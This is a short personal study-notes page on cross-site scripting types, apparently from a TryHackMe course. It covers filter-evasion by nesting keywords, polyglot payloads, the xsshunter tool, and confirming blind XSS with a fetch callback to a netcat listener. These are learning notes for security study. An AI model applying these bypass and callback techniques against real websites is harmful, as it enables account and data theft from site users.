Section - Cross-site Scripting

Notes:

  • Types:
    • Reflected XSS - User-provided data in a request is shown/added to the website source-code without (proper) validation
    • Stored XSS - Malicious comments, code, etc, that is stored in the website’s database and shown to other users, in which it is executed.
      • Good example is someone posts a comment on a forum and the comment is malicious and isn’t filtered/validated, and is then shown to others.
    • DOM Based XSS - When malicious JS is executed within the browser, vs a new page being loaded, etc
      • Not super common, but it usually requires a good amount of JS knowledge to see what things are being pulled in from the browser.
      • eval() is your friendi
    • Blind XSS - Very similar to stored XSS, except you can’t see the execution of the payload/test it/see it with your eyes.
      • Ex: A support chat doesn’t validate your ticket content
      • THM recommended the tool xsshunter
  • Try seeing what words are filtered out of an xss filter, can you trick it? Probably.
    • Ex: script is removed, but perhaps scscriptript would be stripped to become script
  • Polyglots
    • Basically a giant sometimes makes a one size fits all xss payload to break common filters.
  • Netcat is your friend for potential blind xss, have a way to send a request in the browser via fetch to your machine. If you get a response, nice, it worked!
Copyright © 2022 AJ Nicoloff Original Theme by Zheli Design